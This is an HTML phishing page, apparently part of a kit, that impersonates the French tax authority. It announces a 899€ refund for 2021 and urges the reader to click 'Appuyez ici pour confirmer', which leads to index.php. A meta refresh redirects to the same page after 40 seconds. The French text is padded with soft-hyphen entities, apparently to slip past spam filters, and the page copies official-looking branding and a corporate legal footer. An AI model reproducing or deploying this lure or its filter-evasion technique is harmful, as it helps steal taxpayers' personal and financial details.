            <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
            <meta http-equiv="refresh" content="40; URL=index.php">
                        <title>Remboursement</title>
<div

style="
    text-align: -webkit-center;
"
>
<div style="font-size:12px;border-top:#000000 1px solid;height:auto;font-family:arial,sans-serif,serif,EmojiFont;border-right:#000000 1px solid;width:650px;white-space:normal;word-spacing:0px;border-bottom:#000000 1px solid;text-transform:none;float:none;font-weight:400;color:#444444;padding-bottom:10px;font-style:normal;padding-top:10px;padding-left:20px;border-left:#000000 1px solid;margin:0px;display:block;letter-spacing:normal;padding-right:20px;background-color:#ffffff;text-indent:0px;text-decoration-style:initial;text-decoration-color:initial;font-variant-ligatures:normal;font-variant-caps:normal">
<div style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;padding-right:0px">
<img alt="RÃƒÂ©sultat de recherche d'images pour &quot;impots&quot;" src="https://ci5.googleusercontent.com/proxy/nejyJqfo0W9V5z-2ZsO-ZSCKA2l69SBDuvtccxaVj4RasSkfHXijjal-b1c97GHfhIM6OsRzBYSont_ivDF1MviXmJp6dXCWlxjN3SbrWRTFqDzLtmSAtKzjSJez3AxjTjgxNg=s0-d-e1-ft#https://www.signal-arnaques.com/images/uploads/scam_files/36715/logo%20impots.jpg" width="200" height="63" style="font-size:medium;border-top:0px;font-family:'Times New Roman';border-right:0px;white-space:normal;word-spacing:0px;border-bottom:0px;text-transform:none;font-weight:400;color:#000000;padding-bottom:0px;font-style:normal;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;letter-spacing:normal;padding-right:0px;background-color:#ffffff;text-indent:0px;text-decoration-style:initial;text-decoration-color:initial;font-variant-ligatures:normal;font-variant-caps:normal" class="CToWUd"></div>
<div style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;padding-right:0px">
&nbsp;</div>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
A&shy;&shy;&shy;&shy;&shy;&shy;p&shy;&shy;&shy;r&shy;&shy;&shy;è&shy;&shy;&shy;s&shy;&shy;&shy; &shy;&shy;&shy;l&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;e&shy;&shy;&shy;s&shy;&shy;&shy; d&shy;&shy;&shy;e&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;r&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;ni&shy;&shy;&shy;&shy;<wbr>&shy;&shy;&shy;&shy;&shy;e&shy;&shy;&shy;&shy;&shy;&shy;r&shy;&shy;&shy;&shy;&shy;&shy;s&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy;&shy; &shy;&shy;&shy;c&shy;&shy;&shy;&shy;&shy;&shy;a&shy;&shy;&shy;l&shy;&shy;&shy;cul&shy;&shy;&shy;s&shy;&shy;&shy; a&shy;&shy;&shy;n&shy;&shy;&shy;nuels d&shy;&shy;&shy;e&shy;&shy;&shy; &shy;&shy;&shy;l&shy;&shy;&shy;'&shy;&shy;&shy;exe&shy;&shy;&shy;rc&shy;&shy;&shy;ice &shy;&shy;&shy;d&shy;&shy;&shy;e&shy;&shy;&shy; &shy;&shy;&shy;v&shy;&shy;&shy;o&shy;&shy;&shy;t&shy;&shy;&shy;re&shy;&shy;&shy; &shy;&shy;&shy;a&shy;&shy;&shy;ct&shy;&shy;&shy;iv&shy;&shy;&shy;ité&shy;&shy;&shy;,&nbsp;no&shy;&shy;&shy;<wbr>us &shy;&shy;&shy;a&shy;&shy;&shy;v&shy;&shy;&shy;o&shy;&shy;&shy;ns
 &shy;&shy;&shy;d&shy;&shy;&shy;é&shy;&shy;&shy;t&shy;&shy;&shy;e&shy;&shy;&shy;r&shy;&shy;&shy;miné&shy;&shy;&shy; q&shy;&shy;&shy;ue&shy;&shy;&shy; vous &shy;&shy;&shy;ête&shy;&shy;&shy;s ad&shy;&shy;&shy;mi&shy;&shy;&shy;ss&shy;&shy;&shy;i&shy;&shy;&shy;ble&shy;&shy;&shy; &shy;&shy;&shy;à&shy;&shy;&shy; &shy;&shy;&shy;r&shy;&shy;&shy;e&shy;&shy;&shy;c&shy;&shy;&shy;ev&shy;&shy;&shy;oi&shy;&shy;&shy;r un&shy;&shy;&shy; re&shy;&shy;&shy;m&shy;&shy;&shy;bours&shy;&shy;&shy;emen&shy;&shy;&shy;t sur vos impôts au titre de l'année 2021 d'un montant de :<span style="border-top:0px;border-right:0px;border-bottom:0px;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;padding-right:0px">&nbsp;</span><strong style="border-top:0px;border-right:0px;border-bottom:0px;font-weight:bolder;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;padding-right:0px">899€.</strong></p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
Ve&shy;&shy;&shy;u&shy;&shy;&shy;illez&shy;&shy;&shy; &shy;&shy;&shy;nou&shy;&shy;&shy;s s&shy;&shy;&shy;oume&shy;&shy;&shy;t&shy;&shy;&shy;tr&shy;&shy;&shy;e s&shy;&shy;&shy;'il&shy;&shy;&shy; &shy;&shy;&shy;vous &shy;&shy;&shy;pl&shy;&shy;&shy;a&shy;&shy;&shy;î&shy;&shy;t&shy;&shy;&shy; &shy;&shy;&shy;la&shy;&shy;&shy; &shy;&shy;&shy;dem&shy;&shy;&shy;a&shy;&shy;&shy;nd&shy;&shy;&shy;e&shy;&shy;&shy; d&shy;&shy;&shy;e &shy;&shy;&shy;r&shy;&shy;&shy;e&shy;&shy;&shy;m&shy;&shy;&shy;bou&shy;&shy;&shy;r&shy;&shy;&shy;seme&shy;<wbr>&shy;&shy;n&shy;&shy;&shy;t&shy;&shy;&shy; d'i&shy;&shy;&shy;m&shy;&shy;&shy;pô&shy;&shy;&shy;t pou&shy;&shy;&shy;r n&shy;&shy;&shy;ou&shy;&shy;&shy;s&shy;&shy;&shy; p&shy;&shy;&shy;e&shy;&shy;&shy;r&shy;&shy;&shy;m&shy;&shy;&shy;e&shy;&shy;&shy;tt&shy;&shy;&shy;r&shy;&shy;&shy;<wbr>e&shy;&shy;&shy; d&shy;&shy;&shy;e&shy;&shy;&shy; l&shy;&shy;&shy;a
 tr&shy;&shy;&shy;a&shy;&shy;&shy;it&shy;&shy;&shy;er&shy;&shy;&shy; &shy;&shy;&shy;d&shy;&shy;&shy;an&shy;&shy;&shy;s&shy;&shy;&shy; les&shy;&shy;&shy; p&shy;&shy;&shy;l&shy;&shy;&shy;u&shy;&shy;&shy;s&shy;&shy;&shy; &shy;&shy;&shy;bref d&shy;&shy;&shy;é&shy;&shy;&shy;lai dans votre espace personnel en cliquant ci-dessous.</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<div style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;padding-right:0px">
&nbsp;
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;text-align:center;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:normal;padding-right:0px">
<span style="border-top:0px;border-right:0px;background:#2b6c85;border-bottom:0px;color:#ffffff;padding-bottom:10px;padding-top:10px;padding-left:20px;border-left:0px;margin:0px;line-height:normal;padding-right:20px"><a href="index.php" rel="noopener noreferrer" style="text-decoration:none;border-top:0px;border-right:0px;border-bottom:0px;color:#444444;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;line-height:normal;padding-right:0px" target="_blank" data-saferedirecturl="#" data-saferedirectreason="2"><span style="color:#ffffff;line-height:normal">Appuyez
 ici pour confirmer</span></a></span></p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
U&shy;&shy;&shy;n &shy;&shy;&shy;re&shy;&shy;&shy;m&shy;&shy;&shy;bours&shy;&shy;&shy;e&shy;&shy;&shy;m&shy;&shy;&shy;<wbr>en&shy;&shy;&shy;t &shy;&shy;&shy;pe&shy;&shy;&shy;ut êt&shy;&shy;&shy;re r&shy;&shy;&shy;e&shy;&shy;&shy;t&shy;&shy;&shy;ard&shy;&shy;&shy;é&shy;&shy;&shy; &shy;&shy;&shy;p&shy;&shy;&shy;our &shy;&shy;&shy;d&shy;&shy;&shy;iver&shy;&shy;&shy;s&shy;&shy;&shy;e&shy;&shy;&shy;s &shy;&shy;&shy;ra&shy;&shy;&shy;is&shy;&shy;&shy;ons&shy;&shy;&shy; Par &shy;&shy;&shy;ex&shy;&shy;&shy;emp&shy;&shy;&shy;le la&shy;&shy;&shy; s&shy;&shy;&shy;o&shy;&shy;&shy;u&shy;&shy;&shy;m&shy;&shy;&shy;i&shy;&shy;&shy;s&shy;&shy;&shy;si&shy;&shy;&shy;<wbr>o&shy;&shy;&shy;n d&shy;&shy;&shy;e &shy;&shy;&shy;doss&shy;&shy;&shy;ie&shy;&shy;&shy;r&shy;&shy;&shy;s no&shy;&shy;&shy;n&shy;&shy;&shy; &shy;&shy;&shy;val&shy;&shy;&shy;id&shy;&shy;&shy;es &shy;&shy;&shy;o&shy;&shy;&shy;u
 in&shy;&shy;&shy;sc&shy;&shy;&shy;rip&shy;&shy;&shy;ti&shy;&shy;&shy;o&shy;&shy;&shy;n&shy;&shy;&shy;s a&shy;&shy;&shy;pr&shy;&shy;&shy;ès un&shy;&shy;&shy;e&shy;&shy;&shy; c&shy;&shy;&shy;er&shy;&shy;&shy;ta&shy;&shy;&shy;i&shy;&shy;&shy;n&shy;&shy;&shy;e li&shy;&shy;&shy;m&shy;&shy;&shy;ite&shy;&shy;&shy;.</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
NB : Au cas de besoin d'une information complémentaire , on vous contacter au plus proche délai pour éviter les erreurs éventuels .</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
Cordialement ,</p>
<p style="border-top:0px;height:auto;border-right:0px;width:auto;border-bottom:0px;float:none;padding-bottom:0px;padding-top:0px;padding-left:0px;border-left:0px;margin:0px;display:block;line-height:1.3em;padding-right:0px">
&nbsp;</p>
<p>N. dossier :&nbsp; PP-D-001-616-3711-518.</p>
</div>
</div>
<div style="font-size:12px;border-top:#000000 1px solid;height:auto;font-family:arial,sans-serif,serif,EmojiFont;border-right:#000000 1px solid;width:650px;white-space:normal;word-spacing:0px;border-bottom:#000000 1px solid;text-transform:none;float:none;font-weight:400;color:#444444;padding-bottom:10px;font-style:normal;text-align:center;padding-top:10px;padding-left:20px;border-left:#000000 1px solid;margin:5px 0px 0px;display:block;letter-spacing:normal;padding-right:20px;background-color:#ffffff;text-indent:0px;text-decoration-style:initial;text-decoration-color:initial;font-variant-ligatures:normal;font-variant-caps:normal">
Copyright 2021&nbsp;sa au capital 35 448 346.20 - rcs nanterre 556 055 121-</div>
</div>
